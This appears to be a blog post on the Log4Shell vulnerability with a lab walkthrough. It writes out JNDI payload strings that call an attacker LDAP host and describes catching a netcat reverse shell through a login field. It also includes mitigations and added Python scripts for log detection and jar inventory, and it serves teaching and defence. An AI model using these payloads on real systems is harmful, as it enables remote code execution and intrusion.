Log4j Vulnerability

CSCC LABS
6 min read · Mar 17, 2022

On December 9th, 2021, the world was made aware of the single biggest and most critical vulnerability to date, CVE-2021-44228, affecting the Java-based logging utility Log4j.

What Is Log4j?

The vulnerability is known as Log4Shell, an internet-wide flaw that affects millions of computers and involves an obscure but nearly ubiquitous piece of software, Log4j. The software is used to record all manner of activities that go on under the hood in a wide range of computer systems.

Log4j is a powerful logging library used by web servers and other applications to record their activity. The Log4j code is developed by an open-source project managed by the Apache Software Foundation. Companies worldwide use the Log4j library to enable logging in a wide set of applications. The Log4j flaw allows attackers to run arbitrary code on vulnerable machines, or to break into any application that uses the Log4j framework directly.

The Apache Software Foundation assigned it the maximum severity score of 10/10. The vulnerability gives attackers remote code execution, and the payload string looks like “${jndi:ldap://attacker.com/a}”.

What does log4j do?

Log4j records events — errors and routine system operations — and communicates diagnostic messages about them to system administrators and users.

Example: we usually get a 404 error when typing or clicking a bad link. The web server for the domain of the link we tried to reach tells us that there is no such web page. It also records that event, using Log4j, in a log for the server’s system administrators.

How does log4j work?

Log4Shell works by abusing a feature in Log4j that allows users to specify custom code (lookups) for formatting a log message.

For example, this feature allows Log4j to log not only the username but also the real name of a person who attempts to log in to a server, if a separate server holds a directory that links usernames to real names.

For this to happen, the Log4j server has to communicate with the server holding the real names.

That same mechanism lets third-party servers submit software code that Log4j will run, performing all kinds of actions on the targeted computer. This opens the door to malicious activities such as stealing sensitive information, taking control of the targeted system, and slipping malicious content to other users communicating with the affected server.

Five things you must know about Log4j:

1. You may still be vulnerable even if your project is not based on Java.

  • Many tech stacks are vulnerable because so many tools use Log4j, including infrastructure, dev tools, and CI/CD products.

2. Log4Shell will be here for a while.

  • It cannot be upgraded everywhere in a few days, as it is a core component of many products, including network devices, management consoles, and enterprise software and hardware.

3. WAFs can’t protect in full.

  • The exploit can arrive through any protocol, including API calls, DNS, or UDP. At this time, WAFs are helpless.

4. Companies may still be vulnerable even if the vulnerable host is deep inside their network perimeter.

5. There will be breaches.
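Because the payload is just a string in whatever field ends up being logged, the first useful control is to see it arrive. The following is an added example of mine, not code from the original post or from the log4j-shell-poc project: it scans constructed web access-log lines for the ${jndi:...} shape described above, in every request field rather than only a login form (the point of item 3), and extracts the callback host and port as indicators to block at the egress firewall and to hunt for in outbound-connection logs. The log format, addresses and sample lines are assumptions made up for the example.

```python
"""Scan web access-log lines for Log4Shell-style JNDI lookup strings.

Added example, not from the original post: looks for the ${jndi:...} payload
shape in every field of a request, not just the username, and pulls out the
callback host and port so they can be blocked at the egress firewall and
hunted for in outbound-connection logs.
"""
import re
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple
from urllib.parse import unquote

# Matches ${jndi:<scheme>://<host>[:<port>]<path>} for any scheme (ldap, ldaps,
# rmi, dns, ...), case-insensitively. It is a plain signature, nothing cleverer.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*"
    r"(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)

# Apache/nginx "combined" access-log format (an assumption for this example).
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


@dataclass(frozen=True)
class JndiHit:
    line_no: int
    field: str            # which log field carried the payload
    scheme: str
    host: str
    port: Optional[int]   # None when the payload omits it
    raw: str


def find_lookups(text: str) -> Iterator[Tuple[str, str, Optional[int], str]]:
    """Yield (scheme, host, port, raw) for each JNDI lookup in text.

    Percent-decoding first matters: a payload in a query string is usually
    URL-encoded and would slip past a byte-for-byte match otherwise.
    """
    for m in JNDI_RE.finditer(unquote(text)):
        port = int(m.group("port")) if m.group("port") else None
        yield m.group("scheme").lower(), m.group("host"), port, m.group(0)


def scan_access_log(lines: List[str]) -> List[JndiHit]:
    hits: List[JndiHit] = []
    for n, line in enumerate(lines, 1):
        m = ACCESS_RE.match(line)
        # Lines that do not parse are still scanned as one blob so nothing is missed.
        fields = m.groupdict() if m else {"line": line}
        for field, value in fields.items():
            for scheme, host, port, raw in find_lookups(value):
                hits.append(JndiHit(n, field, scheme, host, port, raw))
    return hits


def callback_indicators(hits: List[JndiHit]) -> List[str]:
    """Distinct host[:port] values the payloads would connect back to."""
    return sorted({h.host if h.port is None else f"{h.host}:{h.port}" for h in hits})


# Constructed sample lines (not real traffic). The first payload reuses the
# host:port from the post's lab; the second uses a documentation address.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://192.168.29.163:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:09 +0000] "GET /search?q=%24%7Bjndi%3Armi%3A%2F%2F'
    '198.51.100.7%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit.line_no} [{hit.field}] {hit.scheme} -> {hit.host}:{hit.port}  {hit.raw}")
    print("block these egress destinations:", callback_indicators(scan_access_log(SAMPLE_LOG)))
```

Two design points matter in practice: the payload is looked for in every field (User-Agent, referer, path, username), since any of them may reach a log statement, and percent-decoding happens before matching, because a payload in a query string normally arrives URL-encoded. Hits in unparsable lines are attributed to the field name "line" rather than dropped.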

Let’s try to set up a vulnerable lab:

STEP-1

  • Clone the log4j-shell-poc repository from GitHub.

STEP-2

  • Once the git clone has completed, change into that directory; for that, I used the command:
  • cd /home/kali/log4j-shell-poc
  • From inside the log4j-shell-poc directory, run the docker build command:
  • docker build -t log4j-shell-poc .

STEP-3

  • Then run the second command from the GitHub page:
  • docker run --network host log4j-shell-poc
  • These commands build and run the Docker image containing the vulnerable app.

STEP-4

  • Once the container is running, check whether the web app is up.
  • For that, browse to the machine’s IP address on port 8080:
  • http://<machine-ip>:8080
  • The vulnerable website should now be displayed.

EXPLOITATION

Now, from the attacker machine, we try to exploit that vulnerable app.

STEP-1

  • Download log4j-shell-poc from GitHub, in the same way as in the lab setup (skip this step if the same machine is used as both target and attacker).

STEP-2

  • Now install the Java JDK on the machine.
  • It can be downloaded at the following link.

STEP-3

  • Go to the download folder and unzip the JDK archive by executing the following command, then move the extracted directory to /usr/bin.

STEP-4

  • After completing these steps, leave the /usr/bin directory and enter the log4j-shell-poc directory.
  • Let’s check the contents of that directory.
  • Here I found something interesting: poc.py.

STEP-5

  • I opened poc.py with the command: sudo nano poc.py
  • Here we need to change ‘./jdk1.8.2.20/’ to ‘/usr/bin/jdk1.8.0_202/’.
  • This changes the path of the Java installation and the Java version used by the script.
  • Now let’s start a Netcat listener.

STEP-6

  • In a terminal, make sure you are in the log4j-shell-poc directory when executing the command:
  • python3 poc.py --userip 0.0.0.0 --webport 8000 --lport 9001

STEP-7

  • This script starts the malicious local LDAP server.
  • Now copy the “send me” string that the script printed: ${jndi:ldap://192.168.29.163:1389/a}
  • Paste it into the username field in the browser. This is our payload.
  • In the password field, anything can be entered.

STEP-8

  • Click the login button to execute the payload, then go back to the Netcat window, where we should get a reverse shell.

We are finally inside the vulnerable web app.

MITIGATIONS:

  • Patching: Internet-facing machines, devices, and services should be patched and updated as soon as the patch/update is released.
  • Visibility: Get an overview of the systems and software that may be using Log4j in your environment. Not every Java-dependent machine is vulnerable, but an old machine, IoT device, or forgotten web service can cause serious trouble, so make sure you have at least visibility.
  • Isolation: Sometimes patching isn’t available right away. Vulnerable devices and services connected/facing the internet should be isolated from it, and mitigation measures should be applied.
  • Use web application firewalls (WAFs) to filter malicious requests.
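The visibility step is the one most teams found hardest, because Log4j is rarely installed on its own: it is bundled inside application jars, wars and ears, often several layers deep. The following is an added example of mine, not code from the original post or from the Apache Log4j project: it walks a directory tree, opens every archive it finds (recursing into archives bundled inside archives, such as WEB-INF/lib), reads the log4j-core version from the Maven pom.properties that real log4j-core jars carry, and checks whether the JndiLookup.class file is present, so that each archive can be reported as vulnerable, mitigated (class removed), fixed, or unknown. The version check covers only CVE-2021-44228, treating 2.15.0 and later, plus the 2.12.2 and 2.3.1 backports, as fixed; the sample jars the demo builds are constructed test data, not real Log4j builds.

```python
"""Inventory Log4j 2 archives on disk and flag the CVE-2021-44228 affected range.
Added example, not from the original post: walks a tree, opens every jar/war/ear/zip
(recursing into bundled archives), reads log4j-core's version from pom.properties
and checks for JndiLookup.class."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Dict, List, Optional

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


@dataclass(frozen=True)
class Finding:
    path: str                # nested archives are written as outer.war!/inner.jar
    version: Optional[str]
    has_jndi_lookup: bool
    status: str              # vulnerable | mitigated | fixed | unknown


def in_cve_2021_44228_range(version: str) -> bool:
    """2.0-beta9 .. 2.14.1 are affected; 2.15.0+, 2.12.2+ and 2.3.1+ are not
    (all 2.0 betas are treated as affected for simplicity; only beta9+ really are)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unparsable log4j version: {version}")
    v = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    if v[0] != 2 or v >= (2, 15, 0):
        return False
    if (v[1] == 12 and v[2] >= 2) or (v[1] == 3 and v[2] >= 1):  # Java 7 / Java 6 backports
        return False
    return True


def assess(zf: zipfile.ZipFile, path: str) -> Optional[Finding]:
    names = zf.namelist()
    version = None
    if POM_PROPERTIES in names:
        lines = zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines()
        props = dict(line.split("=", 1) for line in lines if "=" in line)
        version = props.get("version", "").strip() or None
    has_jndi = JNDI_LOOKUP_CLASS in names
    if version is None and not has_jndi:
        return None                      # not a log4j-core archive at all
    if version is None:
        status = "unknown"               # class present but no version: investigate by hand
    elif not in_cve_2021_44228_range(version):
        status = "fixed"
    elif has_jndi:
        status = "vulnerable"
    else:
        status = "mitigated"             # affected version, but JndiLookup.class was removed
    return Finding(path, version, has_jndi, status)


def scan_archive(data: bytes, path: str, findings: List[Finding]) -> None:
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        finding = assess(zf, path)
        if finding:
            findings.append(finding)
        for name in zf.namelist():       # recurse into bundled archives (WEB-INF/lib etc.)
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(zf.read(name), f"{path}!/{name}", findings)


def scan_tree(root: str) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, findings)
    return findings


def make_jar_bytes(version: Optional[str], with_jndi: bool) -> bytes:
    """Minimal fake jar for the demo (constructed test data, not a real Log4j build)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        if version:
            z.writestr(POM_PROPERTIES, f"version={version}\n")
        if with_jndi:
            z.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def demo() -> Dict[str, str]:
    """Build a constructed sample tree in a temp dir; return {relative path: status}."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "lib"))
    files = {
        "lib/log4j-core-2.14.1.jar": make_jar_bytes("2.14.1", True),   # affected, class present
        "lib/log4j-core-2.17.1.jar": make_jar_bytes("2.17.1", True),   # fixed release
        "lib/commons-lang3.jar": make_jar_bytes(None, False),          # unrelated library
    }
    war = io.BytesIO()   # app.war bundling a 2.14.1 jar with JndiLookup.class stripped out
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", make_jar_bytes("2.14.1", False))
    files["app.war"] = war.getvalue()
    for rel, data in files.items():
        with open(os.path.join(root, *rel.split("/")), "wb") as fh:
            fh.write(data)
    return {f.path[len(root) + 1:].replace(os.sep, "/"): f.status for f in scan_tree(root)}
```

Run scan_tree() against an application directory or a container's filesystem to get the inventory; demo() only lays out a few constructed archives to show the four outcomes. Two caveats worth keeping in mind: a jar with the class removed is reported as mitigated, not fixed, because the later CVEs in the same family need an upgrade, and a jar that carries JndiLookup.class but no pom.properties is reported as unknown rather than silently passed.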
